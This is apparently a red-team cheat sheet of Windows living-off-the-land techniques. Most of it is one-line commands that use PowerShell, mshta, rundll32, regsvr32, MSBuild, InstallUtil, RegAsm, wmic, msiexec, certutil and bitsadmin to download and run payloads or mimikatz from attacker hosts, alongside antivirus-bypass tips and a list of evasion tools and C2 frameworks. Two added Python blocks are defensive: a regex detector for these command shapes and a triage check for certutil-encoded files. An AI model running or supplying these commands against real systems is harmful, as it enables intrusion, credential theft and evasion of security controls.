A curated list of tools and techniques, written from red-team experience, for weaponizing payloads used in enterprise environments to execute attacker-controlled code.
The methods outlined below execute payloads from a local file, from a remote server (HTTP or WebDAV), or entirely in memory.
PowerShell offers endless variations and obfuscation techniques; test them and choose one that works in your environment.
- Invoke-Obfuscation Guide: the well-known PowerShell obfuscator by Daniel Bohannon
- Invoke-CradleCrafter: Cradle obfuscator by Daniel Bohannon
- Powershell without Powershell.exe
- Powershell Download Cradles: Cradles by HarmJ0y
Basic examples that fetch a script over HTTPS and execute it in memory (-UseBasicParsing avoids the Internet Explorer engine dependency of Invoke-WebRequest on Windows PowerShell 5.1):
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')
powershell -c IEX (IWR https://Domain.com/Payload.ps1 -UseBasicParsing)
Run a PowerShell script hosted on a WebDAV server:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
PowerLine: compile it into an EXE with the scripts you want to load listed in its config (e.g. PowerUp.ps1, Invoke-Mimikatz.ps1), then transfer the EXE to the target machine to run PowerShell commands without powershell.exe.
PowerLine.exe -ShowScripts
PowerLine.exe PowerUp "Invoke-AllChecks"
Mshta.exe is a Microsoft binary that executes HTML Application (HTA) files and inline script. Frameworks such as Empire and Metasploit can output payloads in HTA format.
- LOLBAS - Mshta
- MITRE: Mshta
1. mshta vbscript:Close(Execute("GetObject(""script:http://WebServer/payload.sct"")"))
2. mshta https://WebServer/payload.hta
3. mshta \\WebDAVserver\folder\payload.hta
4. mshta script.vba.hta # Execute VBA code embedded in HTA
Rundll32.exe is a Microsoft binary that loads a DLL and calls one of its exported functions. Custom DLLs written in C/C++ (or in C# with an unmanaged export, since rundll32 needs a native entry point) can be used to evade signature-based detection.
rundll32 C:\yourfile.dll,EntryPoint
--> yourfile.dll is your malicious DLL
--> EntryPoint is the exported function called within the DLL
Run inline VBScript:
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("Wscript.Echo ""Hi there!"""),0)
Run a remote SCT payload:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://WebServer/payload.sct");window.close();
MSBuild.exe, shipped with the .NET Framework, builds project files; an inline task inside an XML or .csproj project lets it compile and run C# code on the fly.
- Remotely host MSBuild payloads: hosting MSBuild payloads on WebDAV servers to execute locally (April 2020)
Running a local XML or .csproj payload file:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Payload.xml
Running a payload hosted on a WebDAV server, executed in memory:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\WebDAVserver\Payload.xml
The .NET Framework also ships csc.exe (the C# compiler) and InstallUtil.exe; together they compile and launch custom C# payloads. InstallUtil /U runs the Uninstall method of an Installer class inside the DLL, which is where the payload goes.
Compile the C# source to a DLL:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /unsafe /out:installUtil.dll installUtil.cs
Execute the compiled DLL with InstallUtil.exe (/U triggers the uninstall path):
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /U installUtil.dll
Regsvr32.exe is a Windows command-line tool for registering and unregistering DLLs; with scrobj.dll it also loads COM scriptlets (.sct), which can be used to bypass application control such as AppLocker (the "Squiblydoo" technique).
Method 1: web server delivery. The scriptlet is written to disk in the IE local cache. Command to run on the target machine:
regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll
Method 2: WebDAV server. The scriptlet is written to disk in the WebDAV client local cache. Command to run on the target machine:
regsvr32 /u /n /s /i:\\WebDavServer\tmp\payload.sct scrobj.dll
RegAsm.exe is a .NET Framework tool for registering assemblies; /U calls the assembly's unregistration code, so a payload placed there runs without registering anything.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U payload.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U \\webdavserver\folder\payload.dll
# RegAsm launched through WMI from PowerShell (the child process's parent is WmiPrvSE.exe, not powershell.exe)
PS> $WMIExec=(iwmi win32_process -Name create -ArgumentList "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /u payload.dll")
PS> $WMIExec | select ProcessID
Wmic.exe can execute a local or remote XSL (eXtensible Stylesheet Language) file containing script payloads: the /format switch accepts a stylesheet, and the stylesheet can embed script.
Execute a local or remote file:
wmic os get /format:"https://yourdomain/payload.xsl"
Execute a command:
wmic process call create "cmd.exe /c shell.exe"
Cscript.exe and Wscript.exe are both part of the Windows Script Host (WSH). Cscript.exe runs VBS, JS and WSF scripts entirely on the command line; Wscript.exe does the same but shows script output in a Windows dialog box.
- Cscript application whitelisting bypass
Cscript.exe methods:
1. Run locally
cscript.exe testscript.vbs
2. WebDAV server (the //E switch selects the script engine, so the file extension does not have to match the script language)
cscript //E:jscript \\WebDavServer\folder\payload.txt
Msiexec.exe is the Windows Installer engine for MSI packages. Malicious .msi files can be built to execute payloads, and msiexec will install a package straight from a URL:
msiexec /q /i http://YourDomain/payload.msi
Control.exe is the Windows Control Panel utility; it executes Control Panel item (.CPL) files, which are DLLs renamed to .cpl that export the CplApplet function.
control.exe payload.cpl
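The command shapes above (PowerShell cradles, mshta/rundll32 script monikers, MSBuild and cscript over WebDAV, regsvr32 with scrobj.dll, InstallUtil and RegAsm /U, wmic /format, msiexec from a URL, control.exe with a .cpl) are what a blue team keys on. The Python below is an added example, not part of the original list and not any vendor's ruleset: it encodes those shapes as per-binary regexes and runs them over constructed process-creation records in an assumed Image<TAB>CommandLine layout (how a Sysmon Event ID 1 export might be flattened). Rule names, the record layout and every sample record are made up for illustration.

```python
"""Flag the LOLBin proxy-execution command shapes listed above.

Added example, not from the original list: the rule set, the record layout
(Image<TAB>CommandLine) and the sample records are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    images: tuple          # process image basenames, lower-case
    pattern: str           # regex over the command line, matched case-insensitively


# Each rule pairs a binary with the argument shape that separates proxy execution
# from routine use: mshta.exe on its own is normal, mshta.exe with a script: moniker
# or a remote .hta is not.  Plain local use (rundll32 with a local DLL, msbuild with
# a local project) is deliberately not matched; that needs host and parent-process
# context rather than a command-line regex.
RULES = (
    Rule("powershell_download_cradle", ("powershell.exe", "pwsh.exe"),
         r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b).*https?://"),
    Rule("powershell_unc_script", ("powershell.exe", "pwsh.exe"), r"\\\\[^\\\s]+\\\S+\.ps1"),
    Rule("mshta_script_moniker", ("mshta.exe",), r"\b(vbscript|javascript|script):"),
    Rule("mshta_remote_hta", ("mshta.exe",), r"(https?://|\\\\[^\\\s]+\\)\S+\.hta"),
    Rule("rundll32_script_moniker", ("rundll32.exe",), r"\b(javascript|vbscript):"),
    Rule("msbuild_remote_project", ("msbuild.exe",), r"\\\\[^\\\s]+\\\S+\.(xml|csproj)"),
    Rule("installutil_uninstall_dll", ("installutil.exe",), r"/u\b.*\.dll"),
    Rule("regsvr32_scrobj_remote", ("regsvr32.exe",), r"/i:(https?://|\\\\)\S+.*scrobj\.dll"),
    Rule("regasm_unregister_dll", ("regasm.exe",), r"/u\b.*\.dll"),
    Rule("wmic_remote_xsl", ("wmic.exe",), r'/format:"?(https?://|\\\\)'),
    Rule("wmic_process_create", ("wmic.exe",), r"process\s+call\s+create"),
    Rule("cscript_remote_script", ("cscript.exe", "wscript.exe"), r"\\\\[^\\\s]+\\\S+"),
    Rule("msiexec_remote_package", ("msiexec.exe",), r"/i\s+https?://"),
    Rule("control_cpl_file", ("control.exe",), r"\S+\.cpl\b"),
)


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(image: str, command_line: str) -> list[str]:
    """Names of every rule the (image, command line) pair trips, in RULES order."""
    base = _basename(image)
    return [r.name for r in RULES
            if base in r.images and re.search(r.pattern, command_line, re.IGNORECASE)]


def scan(lines) -> list[tuple[str, str, list[str]]]:
    """Run detect() over 'Image<TAB>CommandLine' records and keep only the hits."""
    findings = []
    for raw in lines:
        raw = raw.rstrip("\r\n")
        if not raw or raw.startswith("#"):
            continue
        image, _, cmdline = raw.partition("\t")
        hits = detect(image, cmdline)
        if hits:
            findings.append((image, cmdline, hits))
    return findings


# Constructed sample records mirroring the commands above, plus two benign controls.
SAMPLE_EVENTS = (
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')"),
    (r"C:\Windows\System32\mshta.exe",
     r'mshta vbscript:Close(Execute("GetObject(""script:http://WebServer/payload.sct"")"))'),
    (r"C:\Windows\System32\rundll32.exe", r"rundll32 C:\yourfile.dll,EntryPoint"),  # local DLL: not matched
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll"),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe", r"msbuild.exe \\WebDAVserver\Payload.xml"),
    (r"C:\Windows\System32\wbem\WMIC.exe", r'wmic os get /format:"https://yourdomain/payload.xsl"'),
    (r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\Users\bob\notes.txt"),  # benign
)
SAMPLE_LOG = [f"{image}\t{cmdline}" for image, cmdline in SAMPLE_EVENTS]

if __name__ == "__main__":
    for image, cmdline, hits in scan(SAMPLE_LOG):
        print(f"{', '.join(hits):28} {cmdline}")
```

Matching on the image basename rather than the first token of the command line is deliberate: renaming or copying a LOLBin (as the bitsadmin trick later on this page does) changes the command line but not the original file name, which Sysmon also records in OriginalFileName and which a production rule should key on as well.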
The methods listed below transfer and download remote files onto target machines for payload execution or post-exploitation activity.
PowerShell one-liners to download a remote payload and execute arbitrary code.
This is the most pervasive method these days, so it is likely monitored by the blue team (script block logging captures the decoded command), logged for later analysis and possibly blocked in some environments.
# DownloadFile method (%temp% is expanded by cmd.exe before PowerShell starts; inside PowerShell use $env:TEMP)
powershell -c (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "%temp%\archive.zip")
# Invoke-Expression one-liner
powershell.exe -nop -w hidden -ep bypass -c "IEX ((new-object net.webclient).downloadstring('https://domain.com/script.ps1'))"
# Invoke-WebRequest method
powershell -c IWR "https://example.com/mimikatz.exe" -OutFile ".\mimikatz.exe"
# wget in PowerShell (an alias of Invoke-WebRequest, available since PowerShell 3.0 / Windows 8)
powershell -c wget "http://www.yourdomain.com/file.exe" -outfile "OutputFile.exe"
Curl.exe ships on Linux and on Windows 10 build 17063 and later; it can be used to bypass controls since most AV products do not flag it (yet).
Reference: https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
curl -o nc.exe https://yourdomain.com/nc.exe
Certutil.exe is a Windows built-in for certificate management that can also download remote files and Base64-encode or decode them. Its download use is blocked by Defender on recent builds of Windows 10 but still bypasses some other AV vendors such as Symantec.
File download:
certutil -urlcache -split -f https://download.sysinternals.com/files/PSTools.zip pstools.zip
File encoding and decoding:
certutil -encode pstools.zip pstools.env
certutil -decode pstools.env pstools.zip
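The encode/decode trick works because certutil wraps arbitrary bytes in the same layout as a PEM certificate (certificate headers, 64-character Base64 lines, CRLF line endings), so a transferred binary looks like a harmless .cer/.env file. The Python below is an added example, not from the original list and not certutil's own code: it reproduces that layout, decodes it back, and adds the triage check a responder would run on such a file, namely whether the decoded bytes actually start like a DER certificate (ASN.1 SEQUENCE, 0x30) or like a PE (MZ) or zip (PK). The sample payload is a constructed stub, not a real executable.

```python
"""Reproduce the file layout certutil -encode / -decode use, and triage such blobs.

Added example, not from the original list. The layout (PEM certificate headers,
64-character Base64 lines, CRLF) is what certutil -encode writes; the sample
payload bytes are a constructed stub, not a real executable.
"""
import base64

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"


def certutil_encode(data: bytes, line_len: int = 64) -> str:
    """Base64 the bytes and wrap them the way 'certutil -encode' does."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + line_len] for i in range(0, len(b64), line_len)]
    return "\r\n".join([BEGIN, *lines, END]) + "\r\n"


def certutil_decode(text: str) -> bytes:
    """Drop header/footer lines (if present) and decode the Base64 body."""
    body = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("-----"):
            continue
        body.append(line)
    return base64.b64decode("".join(body), validate=True)


def classify_pem_blob(text: str) -> str:
    """Cheap triage for a certificate-looking file found on a host.

    A DER certificate starts with an ASN.1 SEQUENCE tag (0x30); a PE starts with
    'MZ'; a zip starts with 'PK'.  Anything else under certificate headers is suspect.
    """
    payload = certutil_decode(text)
    if payload.startswith(b"MZ"):
        return "pe-executable"
    if payload.startswith(b"PK"):
        return "zip-archive"
    if payload.startswith(b"\x30"):
        return "der-sequence"
    return "unknown"


# Constructed stand-in for a PE file: DOS magic followed by filler bytes.
SAMPLE_PE = b"MZ\x90\x00" + bytes(124)

if __name__ == "__main__":
    blob = certutil_encode(SAMPLE_PE)
    print(blob)
    print("roundtrip ok:", certutil_decode(blob) == SAMPLE_PE)
    print("classified as:", classify_pem_blob(blob))
```

The classifier is intentionally crude: it answers the one question that matters for this technique (is the thing under the certificate headers a certificate at all?), which a signature on certutil's command line cannot answer once the file has been renamed or moved.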
Bitsadmin.exe is a Windows command-line utility for managing BITS jobs and transferring files. It is blocked by Defender on modern Windows 10 builds, but copying the binary to another name usually gets around that.
Basic example (the local file name must be an absolute path):
bitsadmin /transfer job https://Domain.com/Payload.ps1 %temp%\Payload.ps1
Method to bypass Windows 10 Defender by copying bitsadmin.exe to a separate file for execution:
copy /Y C:\Windows\System32\bitsadmin.exe %temp%\Update.exe
%temp%\Update.exe /transfer newjob https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
PowerShell method (inside PowerShell, %temp% is not expanded; use $env:TEMP):
PS> Start-BitsTransfer -Source https://Domain.com/mimikatz.exe -Destination "$env:TEMP\mimikatz.exe"
- Veil Evasion: generates Metasploit-based payloads, with payload-type and encoding options.
- Lucky Strike: PowerShell tool for creating malicious macro documents.
- Shellter: automated anti-virus evasion toolkit for payload development. Paid and free versions; with some base knowledge it is fairly easy to create fully undetectable (FUD) payloads.
- Magic Unicorn: Python script by TrustedSec (Dave Kennedy) that generates PowerShell commands and payloads as well as various file-type payloads (HTA, macro, certutil). It also accepts Cobalt Strike's C# shellcode output as input.
- SharpShooter: Python framework to create JavaScript, HTA, VBS (and more) payloads using various techniques and evasion features.
- ScareCrow: Go payload-generation framework with many modern payload and evasion techniques. Works well against AV/EDR with the right payloads.
- Cobalt Strike: the gold standard of red-team frameworks for many professionals. Costly but effective.
- Sliver: open-source C2 framework written in Go by the team at Bishop Fox; easy to set up and use, command-line only.
- Mythic: cross-platform, collaborative, open-source C2 with a web UI; easy to set up and a great C2 for Linux/macOS.
- PoshC2: extensible open-source Python3 C2 framework.
- Covenant: open-source C2 framework written in C# (.NET Core) by Ryan Cobb (SpecterOps). Runs and interacts in a similar fashion to PowerShell Empire.
- Metasploit: the standard Kali Linux framework, used by hackers, pentesters and script kiddies alike.
- PowerShell Empire: (DEPRECATED upstream; BC-Security maintains a fork) post-exploitation framework built in PowerShell for setting up listeners, receiving connecting agents, executing payload modules and more.